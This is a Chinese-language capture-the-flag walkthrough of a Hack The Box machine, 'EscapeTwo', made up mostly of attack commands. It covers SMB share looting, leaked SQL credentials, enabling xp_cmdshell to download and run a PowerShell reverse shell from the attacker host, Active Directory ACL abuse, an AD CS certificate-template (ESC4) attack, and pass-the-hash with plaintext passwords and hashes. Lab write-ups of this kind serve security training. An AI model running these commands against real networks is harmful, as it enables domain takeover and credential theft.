USER
nmap -T4 -A -v -Pn 10.10.11.51 -oN escapetwo.txt
sequel.htb
nxc 测试 smb
smbclient -L //10.10.11.51/ -U rose #列出共享文件列表
smbclient //10.10.11.51/"Accounting Department" -U rose #连接到Accounting Department文件夹
mget acc* #下载所有文件
accounts.xlsx 表中发现了账号密码
用 sa 登录到 sqlserver,这里用 impacket-mssqlclient
impacket-mssqlclient 'sa:MSSQLP@ssw0rd!'@10.10.11.51
select is_srvrolemember('sysadmin');确保一下,返回 1,有 sa 权限
exec xp_cmdshell "whoami";报错,说明没开启 xp_cmdshell
EXEC sp_configure 'show advanced options', '1';
RECONFIGURE;
EXECUTE sp_configure 'xp_cmdshell', 1;
RECONFIGURE;开启 xp_cmdshell,然后成功运行了 whoami
EXEC xp_cmdshell 'if not exist C:\temp mkdir C:\temp'; #创建C:\temp目录
EXEC xp_cmdshell "curl http://10.10.14.39/powershell-reverse-shell.ps1 -o C:\temp\re.ps1" #下载re文件
EXEC xp_cmdshell 'powershell -ExecutionPolicy Bypass -File C:\temp\re.ps1'; #执行re文件
开始漫游探索
查看sql-Configuration.INI
WqSZAF6CysDQbGb3
但是没有 user ,查看有一个 ryan
测试他来 evil-winrm,成功登录
d7f4ee55aadb337af3ed88d509497b7f
ROOT
bloodhound-python 跑一下环境
bloodhound-python -u ryan -p WqSZAF6CysDQbGb3 -d sequel.htb -k -c All -dc dc01.sequel.htb -ns 10.10.11.51 --zip
对 CA_SVC 有 writeowner 权限
那就修改他的密码
#远程下载后导入PowerView.ps1
Import-Module .\PowerView.ps1
# 将 ryan 设置为 CA_SVC 的 ACL 的所有者
set-DomainObjectOwner -identity CA_SVC -OwnerIdentity ryan
# 授予 ryan 更改该 ACL 密码的权限
Add-DomainObjectAcl -TargetIdentity CA_SVC -PrincipalIdentity ryan -Rights ResetPassword
# 创建 powershell 凭据并更改凭据
$cred = ConvertTo-SecureString "qwer1234" -AsPlainText -force
set-DomainUserPassword -identity CA_SVC -accountpassword $cred#也可以做到修改权限,但后续还要手动更改密码
impacket-owneredit -action write -new-owner 'ryan' -target 'ca_svc' 'sequel.htb'/'ryan':'WqSZAF6CysDQbGb3'导出证书配置,结尾还能看到 ecs4
certipy find -u CA_SVC@sequel.htb -p qwer1234 -dc-ip 10.10.11.51
但是这里后续如果用下面命令更改证书模板就是会报错
certipy req -u 'CA_SVC' -password '{PASSWORD}' -dc-ip 10.x.x.x -ca sequel-DC01-CA -target sequel.htb -template DunderMifflinAuthentication -upn administrator@sequel.htb -debug换条思路
bloodyAD.py 设置 CA_SVC 所有者为 ryan
python bloodyAD.py --host DC01.sequel.htb -d sequel.htb -u ryan -p 'WqSZAF6CysDQbGb3' set owner ca_svc ryan
impacket-dacledit修改ACL,完全控制权
impacket-dacledit -action 'write' -rights 'FullControl' -principal 'ryan' -target 'ca_svc' sequel.htb/ryan:WqSZAF6CysDQbGb3
AD CS 攻击
certipy-ad shadow auto -u ryan@sequel.htb -p 'WqSZAF6CysDQbGb3' -dc-ip 'DC01.sequel.htb' -ns 10.10.11.51 -target DC01.sequel.htb -account ca_svc
3b181b914e7a9d5508ea1e20bc2b7fce
导入证书,查看一下可能有的问题,这里前面提前知道了可能是 ECS4
export KRB5CCNAME=ca_svc.ccache
certipy-ad find -scheme ldap -k -debug -target DC01.sequel.htb -dc-ip 10.10.11.51 -vulnerable -stdout
#更新证书模板
certipy-ad template -k -template DunderMifflinAuthentication -target dc01.sequel.htb -dc-ip 10.10.11.51 -debug
#利用证书模板打ad cs
certipy-ad req -u ca_svc -hashes :3b181b914e7a9d5508ea1e20bc2b7fce -ca sequel-DC01-CA -target DC01.sequel.htb -dc-ip 10.10.11.51 -template DunderMifflinAuthentication -upn Administrator@sequel.htb -ns 10.10.11.51 -dns 10.10.11.51 -debug最好把模板更新和 adcs 攻击拼接在一起,因为后台刷新太快,还要不断更新时钟
导入证书,拿到 hash
certipy-ad auth -pfx ./administrator_10.pfx -dc-ip 10.10.11.51
impacket-psexec sequel.htb/Administrator@DC01.sequel.htb -hashes :7a8d4e04986afa8ed4060f75e5a0b3ff
aa875105933dddb5485d47a2c6b2473e
Comments | NOTHING